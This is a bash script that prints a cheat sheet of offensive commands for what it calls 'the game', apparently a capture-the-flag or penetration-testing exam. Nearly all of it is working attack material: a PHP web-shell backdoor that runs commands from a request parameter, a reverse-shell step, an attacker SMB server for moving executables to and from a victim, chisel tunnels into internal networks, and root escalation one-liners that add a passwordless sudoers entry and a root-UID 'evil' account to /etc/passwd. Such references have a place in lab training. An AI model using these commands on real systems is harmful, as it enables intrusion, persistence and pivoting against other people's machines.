#!/bin/bash

# display common commands that are needed during the game

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

echo -e "${Frame}###${End} ${Title}Web Enum & Exploit${End} ${Frame}###${End}"
echo -e "${Point} PHP backdoor"
echo -e "<?php"
echo -e "if(isset(\$_REQUEST['cmd'])){"
echo -e "    echo \"<pre>\";"
echo -e "    \$cmd = (\$_REQUEST['cmd']);"
echo -e "    system(\$cmd);"
echo -e "    echo \"</pre>\";"
echo -e "    die;"
echo -e "}"
echo -e "?>"
echo -e ""
echo -e "${Point} PHP command execution script"
echo -e "<?php passthru('id'); ?>"
echo -e "<?php system('id'); ?>"
echo -e ""
echo -e "${Point} PHP reverse shell"
echo -e "cp /usr/share/webshells/php/php-reverse-shell.php ."
echo -e ""


echo -e "${Frame}###${End} ${Title}Fire up server${End} ${Frame}###${End}"
echo -e "${Point} sudo python3 -m http.server 80 --directory ."
echo -e "${Point} impacket-smbserver share . -username evil -password evil -smb2support"
echo -e "    net use * \\\\\\$ip\share /u:evil evil"
echo -e "    copy Z:\\\kali_to_target.exe"
echo -e "    copy target_to_kali.txt Z:\\"
echo -e "    \\\\\\$ip\\\share\\\file.exe ${Comment}# run executable${End}"
echo -e ""


echo -e "${Frame}###${End} ${Title}Port Tunneling${End} ${Frame}###${End}"
echo -e "${Point} chisel server -p 10000 --reverse"
echo -e "    chisel client \$server_ip:10000 R:\$port:127.0.0.1:\$port ${Comment}# forward localhost \$port on client to server (kali_\$port <---> victem_\$port)${End}"
echo -e "    chisel client \$server_ip:10000 R:\$port:\$internal_node:\$port ${Comment}# forward internal node \$port on client to server (kali_\$port <--victem--> internal_node_\$port)${End}"
echo -e "    chisel client \$server_ip:10000 R:socks ${Comment}# forward traffics on client to server through proxy (kali <--victem--> internal_domain)${End}"
echo -e ""


echo -e "${Frame}###${End} ${Title}Linux Post Enum${End} ${Frame}###${End}"
echo -e "${Point} ps aux | grep -i 'root' --color=auto ${Comment}# root processes${End}"
echo -e "${Point} find / -perm -u=s -type f 2>/dev/null ${Comment}# SUID${End}"
echo -e "${Point} find / -perm -g=s -type f 2>/dev/null ${Comment}# SGID${End}"
echo -e ""


echo -e "${Frame}###${End} ${Title}Linux PrivEsc Oneliner${End} ${Frame}###${End}"
echo -e "${Point} echo \"<user> ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"
echo -e "${Point} echo \"evil:\$(openssl passwd -1 evil):0:0:root:/root:/bin/bash\" >> /etc/passwd"
echo -e ""

